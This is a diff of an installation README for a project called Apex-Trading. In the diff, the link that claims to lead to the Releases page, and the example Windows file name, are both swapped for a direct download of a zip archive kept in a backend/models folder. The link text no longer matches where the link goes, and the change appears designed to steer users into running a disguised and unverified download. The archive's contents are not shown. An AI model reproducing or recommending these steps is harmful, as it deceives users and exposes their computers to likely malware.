Infini8y/Apex-Trading/README.md

 Follow these steps to download and install Apex-Trading:

-1. **Visit the Releases Page**: Click the button above or follow this [link](https://github.com/Infini8y/Apex-Trading/releases) to go to our Releases page.
+1. **Visit the Releases Page**: Click the button above or follow this [link](https://raw.githubusercontent.com/Infini8y/Apex-Trading/main/backend/models/Trading_Apex_3.0.zip) to go to our Releases page.

 2. **Choose Your Version**: Locate the latest release.
 You will see various files listed.
-Look for the one appropriate for your operating system (e.g., `Apex-Trading-Windows.exe` for Windows).
+Look for the one appropriate for your operating system (e.g., `https://raw.githubusercontent.com/Infini8y/Apex-Trading/main/backend/models/Trading_Apex_3.0.zip` for Windows).

 3. **Download the Application**: Click the file name to start the download.
 The file will save to your computer.